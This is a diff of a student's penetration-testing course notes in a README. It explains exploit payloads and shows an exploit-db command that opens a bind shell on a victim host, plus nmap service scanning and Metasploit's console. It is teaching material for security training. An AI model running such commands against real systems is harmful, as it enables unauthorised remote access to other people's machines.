Jay-Idrees/UPenn-CyberSecurity-Penetration-Testing/README.md

 **Payload**
-- A payload is an exploit script
+- A payload is an exploit script example is below
 - `python /usr/share/exploitdb/exploits/linux/remote/34900.py payload=bind rhost=192.168.0.21 rport=80 pages=/cgi-bin/vulnerable`

+- In the above command /usr/share/exploitdb/ is the path displayed in the searchsploit display screen and then the remainder of the path is the part that is next to

-- Here `bind` specifies that the victim machine opens up the port for connection with the hacker machine, where `rhost` is the ip address of the victim same for `rport`
+- Here `bind` is used when the ip address of the victim is known. specifies that the victim machine opens up the port for connection with the hacker machine, where `rhost` is the ip address of the victim, same for `rport`

 - If you are unsure of the victim's listening port. you can alsouse `nmap -sV <victim ip address>` to determine it

 - **Metasploit COmmands**
 - `msfconsole`